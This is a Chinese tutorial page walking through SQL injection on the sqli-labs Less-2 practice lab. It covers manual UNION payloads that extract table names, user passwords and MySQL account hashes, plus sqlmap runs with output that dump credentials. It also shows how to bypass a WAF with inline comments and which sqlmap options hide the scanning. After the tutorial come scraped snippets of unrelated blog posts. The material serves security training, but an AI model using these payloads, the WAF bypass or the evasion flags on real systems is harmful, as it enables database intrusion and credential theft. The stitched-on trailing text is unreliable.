渗透之王

SQL注入(sqli-labs）手工注入+对抗WAF+SQLMAP自动化工具（第二关）

上一篇总结： union 联合注入
传入数据库的语句：
select * from user where user_id=“1” union select 1,2,3–+
当前面的产生错误，就执行后面的语句，并将结果返回到前端页面。
一. 不带WAF情况

判断是否存在注入点，注入类型


判断存在一个整型注入。
（2）判断字段数


（3）判断参数位置 union select

根据返回结果发现第2，3位是输入点
（4）注出库名和版本和当前登录用户


（5）爆表（security）
POC:

?id=-1 union 1,2,(select table_name from information_schema.tables where table_schema=database())

返回结果太多，使用limit 限制

?id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1)--+

limit 0,1 表示从第一个表中取，取一个。

想要查看第二个表，将limit 改为 1,1

?id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 1,1)--+

同理：

?id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 2,1)--+

?id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 3,1)--+

?id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 4,1)--+

尝试进行第5个表，返回页面无结果，说明security只有4张表

总结： security库中，只有emails,referers,uagents,users 四张表

（6）选择users表，爆字段

?id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 0,1)--+
?id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 1,1)--+
?id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='users' limit 2,1)--+

users表里面有id,username,password三个字段
（7）爆值
select 这种无法将username,password一一对应爆出来，后面有别的方法

?id=-1 union select 1,2,(select username from users limit 0,1)--+

根据第一关知道总共有13个。代码一样，修改limit 0-12即可

username: Dumb,Angelina,Dummy,secure,stupid,superman,batman
admin,admin1.admin2.admin3,dhakkan,admin4

爆出密码：

?id=-1 union select 1,2,(select password from users limit 0,1)--+

password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le
admin,admin1,admin2,admin3,dumbo,admin4
方法二：

?id=-1 union select 1,2,group_concat(username,0x7e,password) from users--+

利用group_concat()连接函数，0x7e 是 ~的十六进制，方便显示

由于界面的原因，这种显示不完全。

二. 开启安全狗的情况

先查询数据库----爆出所有库
information_schema 数据库中的schemata 表中记录的是存储在mysql的所有库名

?id=-1 union select 1,2,(select (schema_name) from information_schema.schemata limit 0,1)--+
测试过可知： limit 0-5

所有的库名为： information_schema,challenges,mysql,performance_schema
security,test

mysql 库中存储着的是数据库管理员或者登录数据库的用户和密码。
并且由上可知，WAF在Less-2没有作用。
（1）爆出mysql库的所有表（登录我们自己的mysql 先看看有多少表)

emmmmm 这要爆的什么时候，还好我们知道有个user表；因此平时的学习熟记库中表非常重要，eg:information_schema库的利用。
查看下user表的字段数：（一般都会有host,user,password三个字段）

条件都具备了直接爆值：

user

?id=-1 union select 1,2,(select user from mysql.user)--+

返回结果超过一行，使用limit 限制

?id=-1 union select 1,2,(select user from mysql.user limit 0,1)--+

三个用户都是 root

host

?id=-1 union select 1,2,(select host from mysql.user limit 0,1)--+

127.0.0.1 ; ::1; localhost

password

?id=-1 union select 1,2,(select password from mysql.user limit 0,1)--+

数据库采用gbk编码方式时，字段名于查询条件不能同时为中文。
（1）

?id=-1 union select 1,2,(select ascii(password) from mysql.user limit 0,1)–+
ascii()函数返回password的首字母的ascii值。

*的ascii值为42.
（2）利用length 判断password 长度

?id=-1 union select 1,2,(select length(password) from mysql.user limit 0,1)--+

41位分析可知应该是md5加过密的。
（3）因此可采用base64加密然后再解密操作
由于mysql5.6之后的版本有 to_base64(),from_base64()这两个函数
便无法操作。

mysql中密码如果是： update user set password=Password(“str”) where user=‘root’;
这种加密方式，sql注入 select password from mysql.user；就查不出结果。
但是使用 group_concat(0x7e,password)可以查出来。
mysql Password()函数加密从mysql4.1版本出现，5.5.53还有。
mysql5.7中mysql.user表中已经没有password这一项。
取而代之的是： authentication_string

假设mysql 密码生成没有用password函数()：使用这个

?id=-1 union select 1,2,group_concat(user,password) from mysql.user--+

拓展：

关于mysql 中host为 ::1 相当于IPv6的 127.0.0.1。

三.sqlmap 自动化脚本

（1）爆库

>root@kali:~# sqlmap -u 'http://192.168.2.24/sqli-labs/Less-2/?id=1' --dbs --threads=10 --flush-session
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:04:25 /2019-09-03/

[19:04:26] [INFO] flushing session file
[19:04:26] [INFO] testing connection to the target URL
[19:04:26] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:04:26] [INFO] testing if the target URL content is stable
[19:04:27] [INFO] target URL content is stable
[19:04:27] [INFO] testing if GET parameter 'id' is dynamic
[19:04:27] [INFO] GET parameter 'id' appears to be dynamic
[19:04:27] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:04:27] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:04:27] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads spn
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[19:04:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:04:40] [WARNING] reflective value(s) found and filtering out
[19:04:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:04:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:04:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:04:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:04:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:04:41] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:04:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:04:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:04:41] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[19:04:41] [INFO] testing 'MySQL inline queries'
[19:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:04:41] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)
[19:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[19:04:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[19:04:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:04:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:04:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[19:04:51] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable 
[19:04:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:04:51] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:04:51] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:04:51] [INFO] target URL appears to have 3 columns in query
[19:04:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 3204=3204

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 1900 FROM(SELECT COUNT(*),CONCAT(0x7178717871,(SELECT (ELT(1900=1900,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3626 UNION ALL SELECT NULL,NULL,CONCAT(0x7178717871,0x504e4d50584a706e697378696c57797754454370695048714e65437054426b4d6d44766869444162,0x71787a7071)-- dMqh
---
[19:04:58] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[19:04:58] [INFO] fetching database names
[19:04:58] [INFO] used SQL query returns 6 entries
[19:04:58] [INFO] starting 6 threads
[19:04:58] [INFO] retrieved: 'challenges'
[19:04:58] [INFO] retrieved: 'information_schema'
[19:04:58] [INFO] retrieved: 'mysql'
[19:04:58] [INFO] retrieved: 'security'
[19:04:58] [INFO] retrieved: 'test'
[19:04:58] [INFO] retrieved: 'performance_schema'
available databases [6]:                                                       
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

[19:04:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.24'

[*] ending @ 19:04:58 /2019-09-03/

（2）选择mysql 库，爆表

sqlmap -u 'http://192.168.2.24/sqli-labs/Less-2/?id=1' -D mysql --tables --threads=10 --flush-session


Database: mysql                                                                
[24 tables]
+---------------------------+
| user                      |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| ndb_binlog_index          |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| servers                   |
| slow_log                  |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

还可以使用-v3 显示出payload
(3）选择user表，爆出字段

root@kali:~# sqlmap -u 'http://192.168.2.24/sqli-labs/Less-2/?id=1' -D mysql -T user --columns --threads=10 --flush-session

Database: mysql                                                                                                
Table: user
[42 columns]
+------------------------+-----------------------------------+
| Column                 | Type                              |
+------------------------+-----------------------------------+
| User                   | char(16)                          |
| Alter_priv             | enum('N','Y')                     |
| Alter_routine_priv     | enum('N','Y')                     |
| authentication_string  | text                              |
| Create_priv            | enum('N','Y')                     |
| Create_routine_priv    | enum('N','Y')                     |
| Create_tablespace_priv | enum('N','Y')                     |
| Create_tmp_table_priv  | enum('N','Y')                     |
| Create_user_priv       | enum('N','Y')                     |
| Create_view_priv       | enum('N','Y')                     |
| Delete_priv            | enum('N','Y')                     |
| Drop_priv              | enum('N','Y')                     |
| Event_priv             | enum('N','Y')                     |
| Execute_priv           | enum('N','Y')                     |
| File_priv              | enum('N','Y')                     |
| Grant_priv             | enum('N','Y')                     |
| Host                   | char(60)                          |
| Index_priv             | enum('N','Y')                     |
| Insert_priv            | enum('N','Y')                     |
| Lock_tables_priv       | enum('N','Y')                     |
| max_connections        | int(11) unsigned                  |
| max_questions          | int(11) unsigned                  |
| max_updates            | int(11) unsigned                  |
| max_user_connections   | int(11) unsigned                  |
| Password               | char(41)                          |
| plugin                 | char(64)                          |
| Process_priv           | enum('N','Y')                     |
| References_priv        | enum('N','Y')                     |
| Reload_priv            | enum('N','Y')                     |
| Repl_client_priv       | enum('N','Y')                     |
| Repl_slave_priv        | enum('N','Y')                     |
| Select_priv            | enum('N','Y')                     |
| Show_db_priv           | enum('N','Y')                     |
| Show_view_priv         | enum('N','Y')                     |
| Shutdown_priv          | enum('N','Y')                     |
| ssl_cipher             | blob                              |
| ssl_type               | enum('','ANY','X509','SPECIFIED') |
| Super_priv             | enum('N','Y')                     |
| Trigger_priv           | enum('N','Y')                     |
| Update_priv            | enum('N','Y')                     |
| x509_issuer            | blob                              |
| x509_subject           | blob                              |
+------------------------+-----------------------------------+

(4) 选择 host,user,password（低版本mysql有password，高版本为authentication_string) 爆值

root@kali:~# sqlmap -u 'http://192.168.2.24/sqli-labs/Less-2/?id=1' -D mysql -T user -C host,user,password --dump --threads=10 --flush-session

此外sqlmap 还可以直接拿到os shell,sqlshell 等
可以参考我的另一篇文章：https://blog.csdn.net/weixin_43762939/article/details/100141151[sqlmap使用教程]

然后登录服务器查看日志：
在apache的路径下


根据时间，user-agent头部很明显是sqlmap跑出来的。
为了隐蔽可以使用–delay ,–timeout,–random-agent等参数。

Less2 绕WAF

判断是否存在注入，注入类型是：

发现 WAF对 1 进行拦截，内联注释1 ；

换成 and; 1=2 测试

说明是注入类型为数字型。
判断列个数

拦截关键字 by （使用双写，大小写都无效，使用内联注释）
union 注入判断参数位置

测试拦截关键字是 union还是select或者union select组合

说明对select 关键字拦截采用内联注释

说明是对参数位置 2，3有效。
猜解数据库名。

可能对database()关键字过滤
内联注释绕过了但是传到后端数据库不正确，burp跑个爆破

当a为数字型时，对()会关键。

猜出user(),version()
!11440select/%20 1,/!11440user/!()/,/!11440version/!()/–+

发现对关键字,() 进行内联注释，即可。
猜解出表。
POC：
测试对information_schema 关键字过滤。

Python 常用web框架 TigerZ* python 用法相关 python
全功能框架Django应该是最流行的PythonWeb框架了，没有之一。而且其包含了创建应用需要的几乎全部功能，给人的感觉是这个框架希望框架本身实现各种功能，而不是依靠其他的库来完成。比如Django集成了安全认证，URLRouting，模板引擎，ORM以及数据库Scheme映射。这使得Django非常强大，有很好的可扩展性，性能也非常好。Django支持PostgreSQL,MySQL,SQLi
sqli-libs-1字符型 AAran
http://localhost/Less-1/?id=1'测试注入点，出现报错数据库语句应该是：select...from...whereid=’1’......http://localhost/Less-1/?id=1'“使用”不报错，判断为字符型注入，因此需要闭合字符串http://localhost/Less-1/?id=1'orderby4--+http://localhost/Less
Python中使用SQLite ch_s_t Python sqlite python 数据库 sql
一、SQLite3增删改查在Python中使用SQLite3进行数据库操作是一种常见的实践，特别是对于小型应用程序或原型开发。以下是使用Python标准库中的`sqlite3`模块进行增删改查（CRUD）操作的基本示例。1.连接数据库首先，需要连接到SQLite数据库。如果数据库文件不存在，`sqlite3.connect()`将会创建一个新的数据库文件。importsqlite3#连接到SQLi
Sqli-labs靶场第11关详解[Sqli-labs-less-11] 「已注销」 sqli-labs 数据库 web安全网络安全 mysql sql
Sqli-labs-Less-11前言：SQL注入的三个条件：①参数可控；（从参数输入就知道参数可控）②参数过滤不彻底导致恶意代码被执行；（需要在测试过程中判断）③参数带入数据库执行。（从网页功能能大致分析出是否与数据库进行交互）利用orderby来测列数测显位：mysql用1,2,3,4Mysql获取相关数据：一、数据库版本-看是否认符合information_schema查询-version(
sqli-labs less17 password-update语句 Yix1a
转自一位不知名大佬的笔记-----------------------------------less-17-----------------------------------原urlhttp://192.168.137.138/sqli-labs-master/Less-17/页面显示：[PASSWORDRESET]（密码重置）说明这个页面很有可能是使用了update语句很多网页有修改密码的功
解决updatexml和extractvalue查询显示不全 etc _ life 面试问题 sql 数据库
报错注入是一种常见的SQL注入方式，通过注入代码，触发数据库的错误响应，并从错误信息中获取有用的信息。updatexml和extractvalueupdatexml和extractvalue是常用的两个报错注入函数http://localhost/sqli/Less-5/?id=1%27and%20updatexml(1,concat(%27~%27,(select%20user())),1)--
Sqli-labs——lesson11 Shock397 Sqli-labs闯关安全
在11关是登录界面了我们可以先用bp抓包来看它的post请求来再在Hackbar里面的postdata里面对数据进行操作1、在对uname的admin加上'后回显错误，说明此处存在注入漏洞2、首先先在username中验证：用or1=1#即可验证此处确实存在注入漏洞同样在password位也能验证出来3、验证成功后我们开始构造sql语句进行注入1）判断列数:输入orderby3回显错误，2正确，说
基于neo4j的汽车领域知识图谱问答系统程序员～小强 neo4j 汽车知识图谱
介绍：请使用前务必读一下README.md，系统主要是汽车领域相关知识图谱问答系统，包括了汽车的价格、品牌等十几个关系实体，十几个关系，数据量实体7000+，关系9000+整个系统使用django构建，自带了一份数据，比较完整，有初始化数据接口，每次务必初始化数据后使用，neo4j按照README.md初始化，注意初始化可能需要一个多小时。底层数据库知识图谱采用neo4j，关系型数据库采用sqli
sqli-labs靶场安装小红帽Like大灰狼 Kali 网络安全 sql靶场 sql注入小皮搭建sqli-labs靶场
1、下载小皮官网下载：https://www.xp.cn/2、安装小皮不要安装在有中文的目录下3、打开靶场，解压靶场靶场地址（我网盘分享了）sqli-labs靶场提取码：jctl**4、配置网站**5、浏览器访问网站安装成功
《SQLi-Labs》05. Less 29~37 永别了，赛艾斯滴恩 less android 前端
title:《SQLi-Labs》05.Less29~37date:2024-01-1722:49:10updated:2024-02-1218:09:10categories:WriteUp：Security-Labexcerpt:HTTP参数污染，联合注入、宽字节注入。comments:falsetags:top_image:/images/backimg/SunsetClimbing.png
日志题writeup hades2019
1、既然是日志分析，首先打开日志，access.log，摘取片段：id=1%27%20aNd%20%28SelECT%204235%20fRom%20%28SelECT%28sleEp%281-%28If%28ORd%28MId%28%28SelECT%20IfNULL%28CaST%28%60flag%60%20aS%20nChar%29%2C0x20%29%20fRom%20sqli.%60f
sqli-labs-报错注入-updatexml报错唤变 sql
文章目录前言一、updatexml报错二、updatexml报错记忆前言union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用.所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入:有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入.报错注入函数:floor函数extractvalue报错updatexml报错今天我在这里先记录一
云服务器利用Docker搭建sqli-labs靶场环境
在云服务器上利用Docker搭建sqli-labs靶场环境可以通过以下步骤完成：安装Docker：首先，你需要在你的云服务器上安装Docker。具体命令如下：sudoapt-getupdatesudoapt-getinstalldocker-ce拉取sqli-labs镜像：接下来，你需要从DockerHub上拉取sqli-labs的镜像。可以使用以下命令完成：dockerpullaudi1/sql
sqlmap 使用笔记（kali环境） KEEPMA 网络安全笔记
sqlmap使用kali环境-u或–url直接扫描单个路径//如果需要登录要有cookiesqlmap-u"http://10.0.0.6:8080/vulnerabilities/sqli/?id=1"--cookie="PHPSESSID=isgvp2rv4uts46jbkb9bouq6ir;security=low"-m文件中保存多个url，工具会依次扫描url1url2url3-r从文件中
Sqli-Labs 通关笔记神丶上单数据库 mysql sql 网络安全 web
文章目录07-SQL注入1.搭建sqli靶场2.完成SQLi-LABSPage-1**Less-1GET-Errorbased-Singlequotes-String(基于错误的GET单引号字符型注入)**1.获取当前数据库2.获取所有库名3.获取表名4.获取表的所有字段5.获取users表所有字段内容**Less-2GET-Errorbased-Intigerbased(基于错误的GET整型注入
sqli-labs环境安装及所遇到的坑积极向上的三毛
我们采用的是Sqli-labs+phpstudy的方式。1.下载phpstudy并解压安装，下载地址：https://www.xp.cn/download.html?utm_source=so注意：本机由于一开始下的版本过高，导致不兼容。以下为2016版。从网上查询得知，因为sqli-labs是很多年前的了，php版本过高会导致无法解析。2.Sqli-labs项目地址—Github获取：https
CTF--Web安全--SQL注入之Post-Union注入给我杯冰美式 Web安全--SQL注入 web安全 sql 安全
一、手动POST注入实现绕过账号密码检测我们利用sqli-labs/Less-11靶场来进行演示：我们可以看到一个登录页面打开Less-11的根目录，我们打开页面的源代码(PHP实现)。用VS-code打开文件，找到验证登录信息的代码行。此形式的代码存在POST注入漏洞。我们可以注入一句万能密码。admin'or1=1#单看这句代码可能不是很直观，我们将这句万能密码写到源代码中进行观察。@$sql
CTF-Web安全--SQL注入之Union注入详解给我杯冰美式 Web安全--SQL注入 web安全 sql 安全
一、测试靶场与使用工具浏览器：火狐浏览器--Firefox靶场：sqli-labs使用插件：HackBar操作环境：phpstudy二、判断字符型注入与数字型注入操作步骤：1、用F12打开控制台，打开HackBar,LoarURL，将当前靶场的URL信息复制到操作台上2、输入?id=1，观察到页面发生变化，显示的是id=1时数据库中的信息，？是用来分割URL和查询字符串的，查询到了id=1时的用户
http头的sql注入 m0_65106897 笔记
1.HTTP头中的注入介绍在安全意识越来越重视的情况下，很多网站都在防止漏洞的发生。例如SQL注入中，用户提交的参数都会被代码中的某些措施进行过滤。过滤掉用户直接提交的参数，但是对于HTTP头中提交的内容很有可能就没有进行过滤。例如HTTP头中的User-Agent、Referer、Cookies等。2.HTTPUser-Agent注入就拿Sqli-Lab-Less18这里的User-Agent是
Sqli-labs靶场1-5 777sea 网络安全技术学习 sql web安全
流程判断注入点和注入类型判断字段个数判断显示位爆库爆表爆字段名爆内容配置注意事项使用sqli-labs本地靶场，配置本地靶场需要注意的问题：数据库配置文件db-creds.incphp版本由于该靶场比较古早，所以php的版本要选择更低一点的，比如5.3.29Less-1单引号注入1.判断注入点和注入类型单引号报错?id=-1'--+2.查字段个数?id=1'orderby4--+3.判断显示位?i
CenOS6.5搭建sqli-labs-master靶场环境 Toert_T sql注入安全信息安全 sql 网络安全 mysql php
目录一、靶场搭建环境准备二、搭建过程0x1配置本地软件仓库0x2安装sqli-labs支持服务0x3部署sqli-labs靶场三、测试sqli-labs靶场环境一、靶场搭建环境准备sqli-labs-master是一套结合http+php+mysql环境的sql注入练习平台，里面有丰富的sql注入靶场环境虚拟机软件：VMware®Workstation16Pro虚拟机系统：Centos6.5虚拟网
sqli-labs-master靶场搭建流程（附下载链接） ♚林影ᝰ 软件安装数据库
1、下载sqli链接：https://pan.baidu.com/s/146N-5WwhUrqbPgQ3rNkwrA提取码：co582、下载phpstudy链接：https://pan.baidu.com/s/1VD51sW798hDvwBrolU1khw提取码：hpuz3、安装phpstudy解压压缩包直接双击exe文件，进入安装界面注意：安装路径不要有汉字和空格可以自己选择安装路径，然后立即安
sqli-labs-master靶场搭建详细过程（附下载链接） Sarahie 靶场网络安全
1、下载地址：小皮：Windows版phpstudy下载-小皮面板(phpstudy)(xp.cn)Sqli：mirrors/audi-1/sqli-labs·GitCode2、安装小皮3、把sqli压缩包放进去解压，找到$dbpass=''单引号里面填root具体路径如下4、打开小皮，启动apache、mysql，访问：http://127.0.0.1/sqli-labs-master/搭建完成
1.30知识回顾&&SQL注入Bypass [email protected] sql 数据库
不知不觉就一月三十日了，感觉摆着摆着就要开学了，开学的你belike：1.SQL注入GetShellsql注入其实是可以getshell的下面我们就来看一下它的两种类型1.intodumpfile要能实现这个getshell，需要满足以下条件该用户为root权限其配置secure_file_priv需要为空知道能访问得到的绝对路径于是我们就拿sqli的第二关为例我们这样构造pocunionsele
sqli靶场完结篇！！！！ [email protected] sql 数据库 sql注入
靶场，靶场，一个靶场打一天，又是和waf斗智斗勇的一天，waf我和你拼啦！！31.多个)号先是一套基本的判断，发现是字符型，然后发现好像他什么都不过滤？于是开始poc321313132"+union+select+2,user(),"2于是你就会又见到熟悉的朋友，于是就能猜到又有）（这种东西换句poc？发现就能成功bypasss321313132")+union+select+2,user(),(
Sqli靶场23--＞30 [email protected] java 前端 linux
不知不觉鸽了几天了，没办法去旅游摸鱼是这样的了，抓紧时间来小更一下23.过滤注释符号先手工注入一下，就能发现两个单引号不报错，但是一旦上到注释符号的话就会报错，可以猜测出是对注释符号进行了过滤，我们也去看一下源码！！$reg="/#/";$reg1="/--/";$replace="";$id=preg_replace($reg,$replace,$id);$id=preg_replace($re
sqli-labs-master靶场训练笔记（54-65|决战紫禁之巓） Z时代.bug(゜▽゜*) 刷题记录数据库 sql
2024.2.5level-541、先判断类型和闭合类型?id=1/0#正常证明不是数字型?id=1'#错误?id=1'--a#正常判断是'闭合2、判断列数这里需要运气，但是根据前面50多关的经验直接猜测是3列?id=-1'unionselect1,2,3--a3、爆表名，爆列名由于有两个回显位，可以一口气爆两个?id=-1'unionselect1,database(),(selectgroup
sqli.bypass靶场本地小皮环境（1-5关）沧海一粟@星火燎原数据库 oracle
1、第一关http://sqli.bypass/index1.php单引号报错id=1'双引号正常id=1''，应该是单引号闭合id=1'--+注释符用不了，%20和+都用不了%0a可以用没有报错，用布尔盲注，POC：id=1'%0aand%0asubstr('ss',1,1)='s'%0aand%0a'1'='1脚本跑数据比较方便importstringfromtimeimporttime,sl
SQL注入：sqli-labs靶场通关（1-37关）未知百分百安全数据库 sql 数据库通关网络安全安全 web安全安全威胁分析
SQL注入系列文章：初识SQL注入-CSDN博客SQL注入：联合查询的三个绕过技巧-CSDN博客SQL注入：报错注入-CSDN博客SQL注入：盲注-CSDN博客SQL注入：二次注入-CSDN博客SQL注入：orderby注入-CSDN博客SQL注入：宽字节注入-CSDN博客目录第1关（联合查询）第2关（数字型）第3关（'闭合）第4关（")闭合）第5关（报错注入）第6关（"闭合）第7关（secure
sqli.labs靶场（54-65关）沧海一粟@星火燎原数据库 mysql sql
54、第五十四关提示尝试是十次后数据库就重置，那我们尝试union原来是单引号闭合id=-1'unionselect1,database(),(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema=database())--+数据库：challenges，表名是：4c7k78qe8t，就一个表id=
java封装继承多态等麦田的设计者 java eclipse jvm c encapsulatopn
最近一段时间看了很多的视频却忘记总结了，现在只能想到什么写什么了，希望能起到一个回忆巩固的作用。 1、final关键字译为：最终的 &
F5与集群的区别 bijian1013 weblogic 集群 F5
http请求配置不是通过集群，而是F5；集群是weblogic容器的，如果是ejb接口是通过集群。 F5同集群的差别，主要还是会话复制的问题，F5一把是分发http请求用的，因为http都是无状态的服务，无需关注会话问题，类似
LeetCode[Math] - #7 Reverse Integer Cwind java 题解 Math LeetCode Algorithm
原题链接：#7 Reverse Integer 要求：按位反转输入的数字例1：输入 x = 123, 返回 321 例2：输入 x = -123, 返回 -321 难度：简单分析：对于一般情况，首先保存输入数字的符号，然后每次取输入的末位（x%10）作为输出的高位（result = result*10 + x%10）即可。但
BufferedOutputStream 周凡杨
首先说一下这个大批量，是指有上千万的数据量。例子：有一张短信历史表，其数据有上千万条数据，要进行数据备份到文本文件，就是执行如下SQL然后将结果集写入到文件中！ select t.msisd
linux下模拟按键输入和鼠标被触发 linux
查看/dev/input/eventX是什么类型的事件， cat /proc/bus/input/devices 设备有着自己特殊的按键键码，我需要将一些标准的按键，比如0－9，X－Z等模拟成标准按键，比如KEY_0,KEY-Z等，所以需要用到按键模拟，具体方法就是操作/dev/input/event1文件，向它写入个input_event结构体就可以模拟按键的输入了。 linux/in
ContentProvider初体验肆无忌惮_ ContentProvider
ContentProvider在安卓开发中非常重要。与Activity，Service，BroadcastReceiver并称安卓组件四大天王。在android中的作用是用来对外共享数据。因为安卓程序的数据库文件存放在data/data/packagename里面，这里面的文件默认都是私有的，别的程序无法访问。如果QQ游戏想访问手机QQ的帐号信息一键登录，那么就需要使用内容提供者COnte
关于Spring MVC项目（maven）中通过fileupload上传文件 843977358 mybatis spring mvc 修改头像上传文件 upload
Spring MVC 中通过fileupload上传文件，其中项目使用maven管理。 1.上传文件首先需要的是导入相关支持jar包：commons-fileupload.jar,commons-io.jar 因为我是用的maven管理项目，所以要在pom文件中配置（每个人的jar包位置根据实际情况定） <!-- 文件上传 start by zhangyd-c --&g
使用svnkit api，纯java操作svn，实现svn提交，更新等操作 aigo svnkit
原文：http://blog.csdn.net/hardwin/article/details/7963318 import java.io.File; import org.apache.log4j.Logger; import org.tmatesoft.svn.core.SVNCommitInfo; import org.tmateso
对比浏览器，casperjs，httpclient的Header信息 alleni123 爬虫 crawler header
@Override protected void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { String type=req.getParameter("type"); Enumeration es=re
java.io操作 DataInputStream和DataOutputStream基本数据流百合不是茶 java 流
1，java中如果不保存整个对象，只保存类中的属性，那么我们可以使用本篇文章中的方法，如果要保存整个对象先将类实例化后面的文章将详细写到 2，DataInputStream 是java.io包中一个数据输入流允许应用程序以与机器无关方式从底层输入流中读取基本 Java 数据类型。应用程序可以使用数据输出流写入稍后由数据输入流读取的数据。
车辆保险理赔案例 bijian1013 车险
理赔案例：一货运车，运输公司为车辆购买了机动车商业险和交强险，也买了安全生产责任险，运输一车烟花爆竹，在行驶途中发生爆炸，出现车毁、货损、司机亡、炸死一路人、炸毁一间民宅等惨剧，针对这几种情况，该如何赔付。赔付建议和方案：客户所买交强险在这里不起作用，因为交强险的赔付前提是：“机动车发生道路交通意外事故”；如果是交通意外事故引发的爆炸，则优先适用交强险条款进行赔付，不足的部分由商业
学习Spring必学的Java基础知识(5)—注解 bijian1013 java spring
文章来源：http://www.iteye.com/topic/1123823，整理在我的博客有两个目的：一个是原文确实很不错，通俗易懂，督促自已将博主的这一系列关于Spring文章都学完；另一个原因是为免原文被博主删除，在此记录，方便以后查找阅读。有必要对
【Struts2一】Struts2 Hello World bit1129 Hello world
Struts2 Hello World应用的基本步骤创建Struts2的Hello World应用，包括如下几步： 1.配置web.xml 2.创建Action 3.创建struts.xml，配置Action 4.启动web server，通过浏览器访问配置web.xml <?xml version="1.0" encoding="
【Avro二】Avro RPC框架 bit1129 rpc
1. Avro RPC简介 1.1. RPC RPC逻辑上分为二层，一是传输层，负责网络通信；二是协议层，将数据按照一定协议格式打包和解包从序列化方式来看，Apache Thrift 和Google的Protocol Buffers和Avro应该是属于同一个级别的框架，都能跨语言，性能优秀，数据精简，但是Avro的动态模式（不用生成代码，而且性能很好）这个特点让人非常喜欢，比较适合R
lua　set get cookie ronin47 lua cookie
